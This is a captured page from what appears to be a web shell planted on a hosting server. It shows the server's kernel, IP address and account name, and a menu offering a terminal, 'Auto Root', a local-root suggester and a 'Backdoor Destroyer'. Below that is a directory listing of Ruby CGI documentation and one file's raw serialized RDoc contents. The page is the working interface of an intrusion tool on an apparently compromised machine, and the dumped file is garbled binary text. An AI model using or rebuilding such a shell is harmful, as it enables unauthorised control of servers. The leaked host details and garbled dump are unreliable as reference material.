Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby20 /
share /
ri /
2.0.0 /
system /
CGI /
Delete
Unzip
Name
Size
Permission
Date
Action
Cookie
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
HtmlExtension
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
InvalidEncoding
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
QueryExtension
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Session
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
accept_charset%3d-c.ri
347
B
-rw-r--r--
2023-07-26 17:38
accept_charset-c.ri
334
B
-rw-r--r--
2023-07-26 17:38
accept_charset-i.ri
318
B
-rw-r--r--
2023-07-26 17:38
cdesc-CGI.ri
13.45
KB
-rw-r--r--
2023-07-26 17:38
env_table-i.ri
282
B
-rw-r--r--
2023-07-26 17:38
escape-c.ri
427
B
-rw-r--r--
2023-07-26 17:38
escapeElement-c.ri
1.01
KB
-rw-r--r--
2023-07-26 17:38
escapeHTML-c.ri
465
B
-rw-r--r--
2023-07-26 17:38
escape_element-c.ri
314
B
-rw-r--r--
2023-07-26 17:38
escape_html-c.ri
305
B
-rw-r--r--
2023-07-26 17:38
header-i.ri
598
B
-rw-r--r--
2023-07-26 17:38
http_header-i.ri
4.84
KB
-rw-r--r--
2023-07-26 17:38
new-c.ri
2.67
KB
-rw-r--r--
2023-07-26 17:38
out-i.ri
2.63
KB
-rw-r--r--
2023-07-26 17:38
parse-c.ri
537
B
-rw-r--r--
2023-07-26 17:38
pretty-c.ri
800
B
-rw-r--r--
2023-07-26 17:38
print-i.ri
486
B
-rw-r--r--
2023-07-26 17:38
rfc1123_date-c.ri
492
B
-rw-r--r--
2023-07-26 17:38
stdinput-i.ri
283
B
-rw-r--r--
2023-07-26 17:38
stdoutput-i.ri
286
B
-rw-r--r--
2023-07-26 17:38
unescape-c.ri
471
B
-rw-r--r--
2023-07-26 17:38
unescapeElement-c.ri
720
B
-rw-r--r--
2023-07-26 17:38
unescapeHTML-c.ri
470
B
-rw-r--r--
2023-07-26 17:38
unescape_element-c.ri
320
B
-rw-r--r--
2023-07-26 17:38
unescape_html-c.ri
311
B
-rw-r--r--
2023-07-26 17:38
Save
Rename
U:RDoc::AnyMethod[iI"new:ETI" CGI::new;TT:publico:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [I"Create a new CGI instance.;To:RDoc::Markup::BlankLine o:RDoc::Markup::List: @type: NOTE:@items[o:RDoc::Markup::ListItem:@label[I"<tt>tag_maker</tt>;T; [o; ; [ I"LThis is the same as using the +options_hash+ form with the value <tt>{ ;TI"K:tag_maker => tag_maker }</tt> Note that it is recommended to use the ;TI"K+options_hash+ form, since it also allows you specify the charset you ;TI"will accept.;To;;[I"<tt>options_hash</tt>;T; [o; ; [I"(A Hash that recognizes two options:;T@o;; ;;[o;;[I"<tt>:accept_charset</tt>;T; [o; ; [I"?specifies encoding of received query string. If omitted, ;TI"I<tt>@@accept_charset</tt> is used. If the encoding is not valid, a ;TI")CGI::InvalidEncoding will be raised.;T@o; ; [I":Example. Suppose <tt>@@accept_charset</tt> is "UTF-8";T@o; ; [I"when not specified:;T@o:RDoc::Markup::Verbatim; [I"5cgi=CGI.new # @accept_charset # => "UTF-8" ;T:@format0o; ; [I" when specified as "EUC-JP":;T@o;; [I"<cgi=CGI.new(:accept_charset => "EUC-JP") # => "EUC-JP" ;T;0o;;[I"<tt>:tag_maker</tt>;T; [ o; ; [I"KString that specifies which version of the HTML generation methods to ;TI"Guse. If not specified, no HTML generation methods will be loaded.;T@o; ; [I"(The following values are supported:;T@o;; ;;[ o;;[I""html3";T; [o; ; [I" HTML 3.x;To;;[I""html4";T; [o; ; [I" HTML 4.0;To;;[I""html4Tr";T; [o; ; [I"HTML 4.0 Transitional;To;;[I""html4Fr";T; [o; ; [I"HTML 4.0 with Framesets;To;;[I""html5";T; [o; ; [I"HTML 5;T@o;;[I"<tt>block</tt>;T; [o; ; [I"BIf provided, the block is called when an invalid encoding is ;TI"encountered. For example:;T@o;; [ I"encoding_errors={} ;TI"<cgi=CGI.new(:accept_charset=>"EUC-JP") do |name,value| ;TI"% encoding_errors[name] = value ;TI" end ;T;0o; ; [I"FFinally, if the CGI object is not created in a standard CGI call ;TI"Oenvironment (that is, it can't locate REQUEST_METHOD in its environment), ;TI"Pthen it will run in "offline" mode. In this mode, it reads its parameters ;TI"Nfrom the command line or (failing that) from standard input. Otherwise, ;TI"Mcookies and other parameters are parsed automatically from the standard ;TI"ACGI locations, which varies according to the REQUEST_METHOD.;T: @fileI"lib/cgi/core.rb;T:0@omit_headings_from_table_of_contents_below0I"GCGI.new(tag_maker) { block } CGI.new(options_hash = {}) { block } ;TI"name, value;F[ I"(options = {});T@}FI"CGI;TcRDoc::NormalClass0